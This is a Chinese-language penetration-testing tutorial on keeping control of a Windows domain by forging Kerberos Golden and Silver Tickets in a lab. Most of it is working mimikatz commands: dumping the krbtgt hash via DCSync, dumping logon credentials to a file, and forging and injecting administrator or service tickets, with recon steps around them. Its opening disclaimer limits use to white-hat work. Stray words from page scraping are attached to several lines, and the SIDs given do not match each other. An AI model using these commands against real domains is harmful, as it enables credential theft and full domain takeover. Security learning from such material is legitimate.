聲明:本文介紹的技術僅供網絡安全技術人員及白帽子使用,任何我的或組織不可傳播使用相關技術及工具從事違法犯罪行爲,一經發現直接上報國家安全機關處理html
權限維持
黃金票據
ms14068的漏洞原理是僞造域管的tgt,而黃金票據的漏洞原理是僞造krbtgt用戶的票據,krbtgt用戶是域控中用來管理髮放票據的用戶,擁有了該用戶的權限,就能夠僞造系統中的任意用戶sql
- 黃金票據的條件要求:
-
1.域名稱 hacker.com
2.域的SID 值 S-1-5-21-1854149318-4101476522-1845767379
3.域的KRBTGT帳戶NTLM密碼哈希或者aes-256值
0028977ae726d766b150520dc63df9b4
4.僞造用戶名 administrator
提取域用戶krbtgt的NTLM密碼哈希windows
lsadump::dcsync /domain:hacker.com /user:krbtgt
僞造administrator用戶安全
kerberos::golden /admin:administrator /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /krbtgt:ce420fcea94d02d7051ebfb82833edf7 /ptt
白銀票據
白銀票據與ms14068和黃金票據的原理不太同樣,ms14068和黃金票據都是僞造tgt(門票發放票),而白銀票據則是僞造st(門票),這樣的好處是門票不會通過kdc,從而更加隱蔽,可是僞造的門票只對部分服務起做用,如cifs(文件共享服務),mssql,winrm(windows遠程管理),dns等等服務器
- 白銀票據的條件要求
-
1.域名
hacker.com
2.域sid
S-1-5-21-1854149318-4101476522-1845767379
3.目標服務器FQDN
dc.hacker.com
4.可利用的服務
cifs
5.服務帳號的NTML HASH
52c74fc45feba971209be6f2bc068814
6.須要僞造的用戶名
test
獲取域控機hashmarkdown
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>1.txt
僞造白銀票據網絡
kerberos::golden /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /target:dc.hacker.com /service:cifs /rc4:031091bab05b768b471a7060b6d1bbf1 /user:test /ptt
實驗環境:
- Windows Server 2012 R2 x64(域控機)
- Windows 7 x64 sp1 (域用戶機)
- pfSense(路由)
ms14068
具體搭建方法請參照企業級內網的域控環境搭建3萬字詳細部署教程dom
模擬實驗:
僞造黃金票據
信息蒐集
ipconfig /all拿到域名
whoami /all拿到SID
使用mimikatz軟件拿到krbtgt用戶的NTLM密碼哈希
輸入klist purge刪除票證
工具
僞造票證
將蒐集到的信息替換到執行語句中使用mimikatz軟件僞造administrator用戶的票證而後退出
成功拿到域控
刪除票據又拒絕訪問了
url
僞造白銀票據
信息蒐集
ipconfig /all拿到域控ip
輸入ping -a 10.1.1.1獲取域全名dc.kacker.com
whoami /all拿到SID
導出域控機的hash
僞造票證
將蒐集到的信息替換到執行語句中使用mimikatz軟件僞造票證,訪問便可